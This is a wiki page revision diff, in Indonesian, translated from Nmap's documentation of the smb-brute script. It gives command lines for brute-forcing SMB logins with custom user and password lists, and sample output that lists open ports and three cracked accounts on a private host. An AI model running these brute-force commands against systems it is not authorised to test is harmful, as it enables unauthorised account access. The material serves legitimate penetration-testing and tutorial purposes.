Difference between revisions of "Nmap: brute force hack smb password"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html ==File smb-brute== Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse ==User ...)
 
 
(7 intermediate revisions by the same user not shown)
Line 3: Line 3:
 
==File smb-brute==
 
==File smb-brute==
  
Script types: hostrule
+
Script types: hostrule
Categories: intrusive, brute
+
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/smb-brute.nse
+
Download: http://nmap.org/svn/scripts/smb-brute.nse
  
 
==User Summary==
 
==User Summary==
  
Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. Every attempt will be made to get a valid list of users and to verify each username before actually using them. When a username is discovered, besides being printed, it is also saved in the Nmap registry so other Nmap scripts can use it. That means that if you're going to run smb-brute.nse, you should run other smb scripts you want. This checks passwords in a case-insensitive way, determining case after a password is found, for Windows versions before Vista.
+
Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista.
  
This script is specifically targeted towards security auditors or penetration testers. One example of its use, suggested by Brandon Enright, was hooking up smb-brute.nse to the database of usernames and passwords used by the Conficker worm (the password list can be found at http://www.skullsecurity.org/wiki/index.php/Passwords, among other places. Then, the network is scanned and all systems that would be infected by Conficker are discovered.
+
==Contoh Penggunaan==
 
 
 
 
 
 
==Example Usage==
 
  
 
  nmap --script smb-brute.nse -p445 <host>
 
  nmap --script smb-brute.nse -p445 <host>
 
  sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
 
  sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
 +
Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105
  
==Script Output==
+
contoh
  
  Host script results:
+
  nmap --script smb-brute.nse -p445 192.168.0.7
  | smb-brute:
+
  nmap --script smb-brute.nse -p445 192.168.0.80
  |  bad name:test => Valid credentials
+
  nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80
|  consoletest:test => Valid credentials, password must be changed at next logon
+
  Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
|  guest:<anything> => Valid credentials, account disabled
 
  |  mixcase:BuTTeRfLY1 => Valid credentials
 
|  test:password1 => Valid credentials, account expired
 
|  this:password => Valid credentials, account cannot log in at current time
 
|  thisisaverylong:password => Valid credentials
 
|  thisisaverylongname:password => Valid credentials
 
|  thisisaverylongnamev:password => Valid credentials
 
|_  web:TeSt => Valid credentials, account disabled
 
  
 +
==Contoh Output==
  
 +
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB
 +
Nmap scan report for 192.168.0.7
 +
Host is up (0.0045s latency).
 +
Not shown: 989 closed ports
 +
PORT      STATE SERVICE
 +
22/tcp    open  ssh
 +
80/tcp    open  http
 +
139/tcp  open  netbios-ssn
 +
443/tcp  open  https
 +
445/tcp  open  microsoft-ds
 +
873/tcp  open  rsync
 +
8873/tcp  open  dxspider
 +
9001/tcp  open  tor-orport
 +
9050/tcp  open  tor-socks
 +
9090/tcp  open  zeus-admin
 +
22939/tcp open  unknown
 +
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
 +
 +
Host script results:
 +
| smb-brute:
 +
|  derry:123456789 => Valid credentials
 +
|  onno:123456789 => Valid credentials
 +
|_  reza:123456789 => Valid credentials
 +
 +
Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds
  
 
==Referensi==
 
==Referensi==
  
 
* https://nmap.org/nsedoc/scripts/smb-brute.html
 
* https://nmap.org/nsedoc/scripts/smb-brute.html

Latest revision as of 10:12, 23 April 2020

Sumber: https://nmap.org/nsedoc/scripts/smb-brute.html

File smb-brute

Script types: hostrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/smb-brute.nse

User Summary

Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista.

Contoh Penggunaan

nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105

contoh

nmap --script smb-brute.nse -p445 192.168.0.7
nmap --script smb-brute.nse -p445 192.168.0.80
nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80
Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

Contoh Output

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB
Nmap scan report for 192.168.0.7
Host is up (0.0045s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
873/tcp   open  rsync
8873/tcp  open  dxspider
9001/tcp  open  tor-orport
9050/tcp  open  tor-socks
9090/tcp  open  zeus-admin
22939/tcp open  unknown
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)

Host script results:
| smb-brute: 
|   derry:123456789 => Valid credentials
|   onno:123456789 => Valid credentials
|_  reza:123456789 => Valid credentials 

Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds

Referensi